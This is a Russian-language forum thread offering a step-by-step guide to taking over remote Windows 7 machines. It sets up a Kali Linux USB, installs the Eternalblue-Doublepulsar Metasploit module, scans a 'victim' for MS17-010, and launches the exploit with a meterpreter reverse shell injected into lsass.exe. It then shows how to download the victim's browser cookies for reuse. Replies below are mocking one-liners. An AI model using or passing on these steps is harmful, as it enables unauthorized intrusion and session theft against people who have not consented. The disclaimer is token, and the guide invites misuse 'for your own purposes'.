Загрузка...

Взлом компьютера на растоянии

Тема в разделе Социальная инженерия создана пользователем Ilusdsf 18 фев 2019. 459 просмотров

  1. Ilusdsf
    Ilusdsf Автор темы 18 фев 2019 132 22 окт 2018
    Сегодня я постараюсь вам доступным языком обьяснить и пошагово дать инструкцию, как всё же использовать данный эксплоит в своих целях.

    upd: Я никого не побуждаю к действиям. Всё это противозоконно, если вы делайте это в своихкорыстных целях

    На сегодняшний день я не очень то и много нашёл информации по поводу подробной установки Kali linux на ваше устройтво и установку Eternalblue-Doublepulsar(у меня флешка, если вы ставите её на основной жёсткий диск, то ёбли с флешкой вы сможете избежать) Этот способ не 100%-ый т.к. работает на уязвимости порта 445. Я уже писал статью, но сейчас будет подробная пошагавая инструкция исходя из моих опытов. Если у вас вылезла ошибка, я постараюсь ответить и помочь вам.

    Итак приступим.

    Нам потребуется: Прямые руки + Интернет (желательно быстрый)



    С самого начала скачиваем iso файл Kali linux с офф. сайта

    После мы открываем Rufus и выбираем устройство, после во второй строке выбираем "MBR для компьютеров с UEFI" - Ставим мы его потому что некоторые версии BIOS не видят флешки с "MBR для компьютеров с BIOS или UEFI". Сам сталкивался с такой проблемой.

    Потом жмём на дисковод рядом с строкой "FreeDOS" и выбираем путь до нашего Kali Linux.iso

    Соглашаемся с тем, что мы потеряем все данные на флешке и начнётся установка.

    После у нас есть уже сам Kali linux на флешке! Но! Что бы сохранять файлы на нём нужно сделать ещё один раздел под названием persistence и с файловой системой Ext4. Можно сделать это как и в линуксе, так и с виндой. Мой выбор пал на программу MiniTool Partition Wizard

    Скачиваем бесплатную версию и в меню выбираем MiniTool Partition Wizard FreeПосле разделяем флешку на 2 части, на одной у нас будет система, на другой будут храниться файлы, которые были скачаны на Kali linux'е.Создаём раздел persistence с файловой системой Ext4 и ждём.И так. Загружаемся с биоса и выбираем флешку. И в загрузочном меню сначала выбирайте версию Live.После загрузки вас поприветствует приятный интерфейс Kali linux. Но, нам нужно прописать пару команд, без которых у нас ничего сохраняться не будет.Код:
    fdisk -l





    Мы смотрим под каким названием у нас находится раздел persistenceПосле как мы найдём его пишем следующее... (У меня лично пишет /dev/sdb2, у вас скорее всего будет по другому)Код:
    mkdir -p /mnt/sdb2
    mount /dev/sdb2 /mnt/sdb2
    echo "/ union" > /mnt/sdb2/persistence.conf
    umount /dev/sdb2
    reboot





    И после перезагрузки мы выбираем тертью строку с persistence.Хорошо, теперь у нас есть флешка с Kali linux, которая сохраняет все файлы. Далее нам нужно установить wine для работы с EternalBlue-Doublepulsar.Пишем в консолиКод:
    wine





    И он нам пишетКод:
    it looks like multiarch needs to be enabled. as root, please execute "dpkg --add-architecture i386 && apt-get update && apt-get install wine32"
    Usage: wine PROGRAM.... и т.д.





    Из вышесказанного сообщения нам нужно прописать в консольКод:
    dpkg --add-architecture i386 && apt-get update && apt-get install wine32





    Лично у меня 16гб флешка и с 4мб/сек устанавливалось всё это добро около 2-х или трёх часов. Но того стоило (флешка старая, у вас должно быть быстрее)После установки компонентов пишем снова в консольКод:
    wine





    После он не должен писать насчёт установки wine32.Хорошо, дальше нам нужно установить сам EternalBlue-DoublePulsar ПишемКод:
    git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git





    и ждём установки файлов.Далее нам нужно закинуть это в путь /root/.msf4/modules/exploits/windows/smb/ Для открытия скрытых файлов в Linux просто нажмите комбинацию клавиш ctrl + h. Если у вас нету папки .msf4 то пропишите в консольКод:
    msfconsole





    И если у вас нет данных папок /exploits/windows/smb/, то создайте их вручную и СКОПИРУЙТЕ! туда следующие файлы (eternalblue_doublepulsar.rb, deps)После открываем сноваКод:
    msfconsole





    и ждём загрузки.После выполняем ряд следующих комманд, и да, нам нужно узнать ip адресс жертвы, я лично использовал на Linux ifconfig, а для жертвы на телефоне прилождение Fing.Для примера возьмём наш ip => 192.168.0.3А для жертвы придумаем => 192.168.0.8ПоехалиКод:
    msfconsole
    use auxiliary/scanner/smb/smb_ms17_010
    set rhosts 192.168.0.108
    run
    (Тут он пишет, что всё ок)
    use exploit/windows/smb/eternalblue-doublepulsar
    set rhost 192.168.0.108
    set lhost 192.168.0.103
    set targetarchitecture x64(x86)
    set windows/x64/meterpreter/reverse_tcp
    set processinject lsass.exe
    run





    Ах да, чуть не забыл, у вас изначально не будет директорииКод:
    mkdir -p /root/.wine/drive_c





    - вы должны создать её самостоятельно написав следующееВсё! У вас появится доступ к чужому компьютеру (Тестировалось на операционной системе Windows 7 x64 ultimate)Вот некоторые команды meterpreter для использования:Download - загружает с удалённого компьютера на ваш файлы, например вам нужно скачать куки браузера, что бы потом уже использовать их, тогд вы пишетеКод:
    downlaod c:/users/...... (место хранения куки и сам файл куки или папку, где есть этот файл)






    Команда "help", как и может ожидаться, отображает меню помощи "Meterpreter".Команда ‘background‘ переводит текущую сессию Meterpreter в фоновый режим, и мы возвращаемся в командную строку "msf". Для того чтобы вернуться в сессии Meterpreter, просто необходимо обратится к ней снова.Команда "edit" открывает файл, расположенный на целевом хосте. Он использует "vim" и все доступные команды данного редактора.Команда "execute" запускает команду на целевом компьютере.Остальной список базовых команд вы сможете найти на сайте http://www.stanovlenie.org.ua/meterpreter-basic-commands/
     
    Этот материал оказался полезным?
    Вы можете отблагодарить автора темы путем перевода средств на баланс
    Отблагодарить автора
  2. Evgenius
    Evgenius 18 фев 2019 Мастер спорта в рукопашном сексе
    нихуя ты киберомлет
     
  3. DaniilDream
    DaniilDream 16 мар 2019 19 21 мар 2018
    теперь я хакер:spain:
     
  4. razerqwerty1337
    razerqwerty1337 16 мар 2019 Заблокирован(а) 32 14 мар 2019
    Пентагон держись
     
  5. Happy
    Happy 16 мар 2019 Держу курс на заебись 539 23 апр 2017
    не читабельная залупа, засунь код в SRC][/SRC
     
Загрузка...
Top